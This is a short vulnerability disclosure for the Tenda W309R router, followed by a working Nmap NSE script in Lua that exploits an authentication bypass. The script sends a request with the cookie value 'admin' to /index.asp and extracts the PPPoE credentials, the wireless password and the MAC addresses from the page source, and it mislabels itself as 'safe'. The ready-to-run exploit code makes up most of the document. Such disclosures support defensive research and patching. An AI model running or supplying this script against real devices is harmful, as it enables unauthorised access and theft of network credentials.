Tenda Wireless Router W309R doesn’t have proper authentication for the web application console. Though the application asks for password, it has poor cookie management which allows a user to login even without providing the password. Application uses cookie value “admin” to access the private pages which reveals configuration details such as PPoE username, PPoE password, wireless authentication key, details of MAC addresses etc, in the source code. Affected firmware version is V5.07.46 and less.
To be updated
local nmap = require "nmap"
local shortport = require "shortport"
local table = require "table"
local http = require "http"
local stdnse = require 'stdnse'
description = [[
Tenda W309R allows an attacker to access the configuration detailed with no
authentication.
Firmware Tested : V5.07.46
Thanks & Credits : Mahesh Gavkar, Samandeep Singh (@samanLEET), Amit
Ghadigaonkar
]]
---
--@usage
-- nmap host --script http-tenda --script-args user=tenda
--80/tcp open http
--| http-tenda:
--| PPPoE Username : home_user
--| PPPoE Password : 12345
--| Wireless Password : 12345678
--| Clone MAC : AA:AA:AA:AA:AA:AA
--|_ Face MAC : BB:BB:BB:BB:BB:BB
---
author = "Sanoop Thomas a.k.a @s4n7h0"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"safe","discovery"}
portrule = shortport.http
function formatme(line)
local start = string.find(line, '"')
local stop = string.find(line, '";')
return line:sub(start+1,stop-1)
end
function fetchinfo(r)
local tenda = {}
local param,value
for line in r.body:gmatch("[^\r\n]+") do
if(line:match("def_PUN = "))then
table.insert(tenda,"PPPoE Username : " .. formatme(line))
end
if(line:match("def_PPW ="))then
table.insert(tenda,"PPPoE Password : " .. formatme(line))
end
if(line:match("def_wirelesspassword ="))then
table.insert(tenda,"Wireless Password : " .. formatme(line))
end
if(line:match("var cln_MAC ="))then
table.insert(tenda,"Clone MAC : " .. formatme(line))
end
if(line:match("var fac_MAC = "))then
table.insert(tenda,"Face MAC : " .. formatme(line))
end
end
return tenda
end
action = function(host, port)
local user = "admin"
local r
local config = {}
if(nmap.registry.args.user) then
user = nmap.registry.args.user
end
local header = {
cookies = user
}
r = http.get(host,port,'/index.asp',header)
return stdnse.format_output(true, fetchinfo(r))
end